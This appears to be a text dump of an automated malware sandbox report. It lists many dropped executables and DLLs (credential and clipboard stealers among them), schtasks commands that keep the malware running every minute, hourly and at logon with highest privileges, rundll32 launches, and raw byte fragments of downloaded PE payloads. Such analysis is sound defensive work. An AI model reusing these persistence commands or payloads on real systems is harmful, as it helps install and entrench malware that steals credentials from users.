                                    C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\toolspub1.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\nspACB2.tmp\INetC.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\rty25.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\Temp\Task.bat
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\FirstZ.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    cmdline
                                    SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks  /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\toolspub1.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\rty25.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\FirstZ.exe
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\nspACB2.tmp\INetC.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\toolspub1.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2676
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000138
        
      
      
      

    
  
    
      process_identifier:
      
        
          2672
        
      
      
      

    
  
    
      current_directory:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
        
      
      
      

    
  
    
      filepath_r:
      
        
          
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          134217728
        
      
      
        (CREATE_NO_WINDOW)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000013c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2760
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000144
        
      
      
      

    
  
    
      process_identifier:
      
        
          2756
        
      
      
      

    
  
    
      current_directory:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
        
      
      
      

    
  
    
      filepath_r:
      
        
          
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          134217728
        
      
      
        (CREATE_NO_WINDOW)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000140
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          SCHTASKS
        
      
      
      

    
  
    
      parameters:
      
        
          /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
        
      
      
      

    
  
    
      filepath:
      
        
          SCHTASKS
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          rundll32.exe
        
      
      
      

    
  
    
      parameters:
      
        
          C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        
      
      
      

    
  
    
      filepath:
      
        
          rundll32.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ShellExecuteExW

  
  
    
      
    
  


  
    
      show_type:
      
        
          0
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
        
      
      
      

    
  
    
      parameters:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          1
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          16
        
      
      
        (PAGE_EXECUTE)
      
      

    
  
    
      base_address:
      
        
          0x070e0000
        
      
      
      

    
  
    
      process_handle:
      
        
          0xffffffff
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
GetAdaptersAddresses

  
  
    
      
    
  


  
    
      flags:
      
        
          15
        
      
      
      

    
  
    
      family:
      
        
          0
        
      
      
      

    
  


    

111

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@ º´	Í!¸LÍ!This program cannot be run in DOS mode.

$šÇƒ®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýߦíýŒÎèüó¦íýŒÎéü̦íýŒÎîü˦íý×Þnýצíý×Þ~ýû¦íýÞ¦ìý÷¤íý{ÏãüŽ¦íý{Ïîüߦíý{ÏýߦíýÞ¦zýߦíý{ÏïüߦíýRichÞ¦íýPEL²eà"¬	RwÀ	@`ÜH@€@@dŽ|@
L–à
”uð4@À	”.text«	¬	 `.rdata‚ûÀ	ü°	@@.datalpÀH¬@À.rsrcL–@
˜ô@@.reloc”uà
vŒ
@B¹t
Mè8ýhé#DèðYÃhó#DèƒðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYá0MQ‹@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè
ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYù%M蝘h?$DèÕïYÃV‹ñN贇N謇j(VèâìYY‹Æ^ÂU‹ìƒì8Ç0MtÉI3ÒÇœM0ÉI‰ M‰¤MVQf‰¨Mèo¡0M‹@ǀ0M\ÉI¡0M‹H”ûÿÿ‰,M3À¹¸M£ÌM£ÐM£ÔMèY
¹èMè헹øMè㗹Mèٗ3À¹„M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xM蛗3ÀǬM<ÉI¹M£”M£˜Mf£œM£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèϖ¹(Mè€ÇM<ÉI3Ò¹M‰M‰M‰M膹@M蓖3À¹„MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0M‹HÁ4M薍Mè胼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£€Mf£lM¢”M¢}M£\MÿhÂI‹ð…ö…3҉|MèÂRÿhÈI¸0M^É¡0M¹@MV‹@ǀ0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨M‹Î腕h ÉI‹ÎèoW¸0M^ÂV‹ñNèe•Nè
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@º´	Í!¸LÍ!This program cannot be run in DOS mode.

$wDþØ3%‹3%‹3%‹hM“Š=%‹hM•Š­%‹hM”Š %‹æH”Š!%‹æH“Š'%‹æH•ŠF%‹hM‘Š"%‹3%‘‹ã%‹¨K™Š2%‹¨Ko‹2%‹¨K’Š2%‹Rich3%‹PELl֖eà
°Ä_@ @€@@8Ð6`ðØ(Ð6`´8Ð6<@à  j@@àP@
ª@à´@àP ´@à.rsrcð´@àÐ/¶@à.data°	Ð6¨	¶@àÌ%õŽ½ ¸ä
{÷v:]rƒ#Ý ¢í÷:þIì]À™_²½­õ
taúû¹ÝêBû},#nÂÿd–ª`t|áIÂÖ8	ÑÔ¨^Yo@Çxº3>+7!°ß՜r=!˜¸ytEÈ«½ñÞUTl¸ÊF3<’ŒÍ«zû.Ÿµý9øñ3Qÿ "±!¸ï½‰5$ˆj²dýæœôÆ.Ðbd”0XÅ9ò%™»0	Ý>' õï*+ÐKûvâ.âŸÂs#_ÓF+ß.˜ õw¡³ücRýóºJ3IK…Û<|/¿Jñãwz„%®(bÌ¹%’5lZø^sê`£…ìGÜg_݌;,Âk™´¡4ѱ¡gÇ»¼©lf$¨TFʋ|¿‚£—-¶ÚzP›%¦‰Dí)µ8PYÙŽ¤•p%ƒŠOLä”*ZÃÏ6Xydˆ¯·€å¤Ó_ÂS(«Uª^×]Žœ­èßY%ª×RôF¸¸9A±Ÿ‹Øê՜« g=ˆ’¾r™¼ÃÎ%Þðp)
¢é5Óÿ??Ù1ÊB<c1Ÿo5àÉÆa¸é•1,õÇyPûVþQ|›<N´öfª€¶¿dûÙ¯_eʆ¢²øÄÉ9Þ ûfw˜ŸÇXlè*¬È&„|1yˆM^õ#;óböY·ëé|õEe±ÚQQÐ0þ‹OèûyUhF[:·ÓÆ<J›Ý=±]ŜŠ=±AZ|û.K§ÆÕî]3wóQ™«÷—1ê)?ë%¹K.(	çب3‰þd•ÃÂv†¼Sgs çrìë,)<ô›%6û®:걧oa#@¹§ NoJq™§Ø;vʇF#B¼í…à‹J䈡xúýegòÑóš4b ŒÅ3-„ŒæØ^‚â-AÆÙÌ`ÒS<Æşi.Bý6ûÔg$[È2V$Åšr~	§ðÁ?o4	…·»4›Šì1]ñG4„¯Æ贋˭¯ÅYyIÕÑã…0EÚIÆt=”#ۓŒÞìù«c«y—wA…½‡’>'Q„É­7˜]‘dö5źxq]Λ"^ðx/"jnK«ˆ_–\rÒÁ»fÖVñ³p°^Í4nðeŽýù©È°å£ï×ÁRÚ¨ï×½óð²q3w‘CÁwÚU÷·{ãlúÍ «çV©\y¯ÏZ8¶“­ÃFBãl4ÇT‘	Fñ¦¶ãwf’–zmh_¬Ò…Æ“þû£×ËH]PÊÙüˆá¦xÚåfÃçQAµ#^’®`ŒfÅاBB^lì’иf0êË,ÁÀUnUb“Mj”E^ÕzÔªAl–˜
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PEL‰¡$eà.0êî	  @ ``… 	K ˜@X	  H.textôé ê `.rsrc˜ ì@@.reloc@ò@BÐ	H¸‰XYã`$0]+(- 0~:K€(
 è  s
(
þþ
(
(
 ?rps
z*6+(ÔïV\(*N+(\L(’(
*j+(΂-/(’(
}*0@s
@
(&*0c ?(	
~
(
:E Óå Ó6!a~p{®a(3(
%(& Ð(
(&(&*0(
~

8iš
	o
 þB™Þ b Éõvúa~p{ea(3(
90	o
 (:*(&(	o
(&XŽi?Žÿÿÿ(&*0‚(
~

8^š
	o
 "þ÷6 b"/*a~p{Ua(3(
9+	o
 (:*(&	o
(&XŽi?™ÿÿÿ(&*0
e ?(	
~
(
:G.(
þ%(&%~
(
& Ð(
(&(&*0_~
o 

:~
o!
o"
8o#
;	o"
Ý
9o$
ÜÝ&Ý*
9F
XX0ä(((( ÆìF% ôLéa~p{Ža(3( d©ˆ‹ VÿéX Êo€na~p{Za(3 vòBb wŸBX &÷Þa~p{³a(3 PÊf Ù~¶žX s(«¬a~p{«a(3( ç4Z€ 󚃶a~p{ta(3 Ñ
¨ >>­ a~p{fa(3 ¨Pe› Áb€a~p{Za(3( žD£ ÒmU’a~p{€a(3 Z])Ï äu8Éa~p{“a(3 z{SÀf mÄaa~p{Pa(3( ×(œ i˜Ða~p{ªa(3 
¸’ ü*•a~p{Za(3 p·¡
f ¶è²Ëa~p{sa(3( ë‘j7 ?Îð:X X–Ça~p{aa(3 ‚€¾Õ N‰–™a~p{•a(3 ´µßŸ WhZQa û¨éòa~p{†a(3( È\g hçþY ƒ…-a~p{aa(3 m#˽ ·*èÏa~p{¶a(3 ÿ
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
